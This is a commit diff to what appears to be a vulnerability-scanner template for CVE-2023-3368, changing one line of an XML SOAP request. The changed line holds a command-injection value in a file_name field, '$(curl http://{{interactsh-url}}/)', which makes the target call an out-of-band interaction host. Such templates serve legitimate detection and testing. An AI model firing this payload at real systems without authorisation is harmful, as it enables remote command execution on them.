feat: add protocol to interactsh URL (CVE-2023-3368)

Signed-off-by: Dwi Siswanto <me@dw1.io>
patch-1
Dwi Siswanto 2023-12-04 21:25:08 +07:00
parent b8f596bed9
commit 4e3b443e79
No known key found for this signature in database
GPG Key ID: D192CC08161630BD
1 changed files with 1 additions and 1 deletions

View File

@ -46,7 +46,7 @@ http:
</item>
<item>
<key xsi:type="xsd:string">file_name</key>
<value xsi:type="xsd:string">$(curl {{interactsh-url}})</value>
<value xsi:type="xsd:string">$(curl http://{{interactsh-url}}/)</value>
</item>
<item>
<key xsi:type="xsd:string">service_ppt2lp_size</key>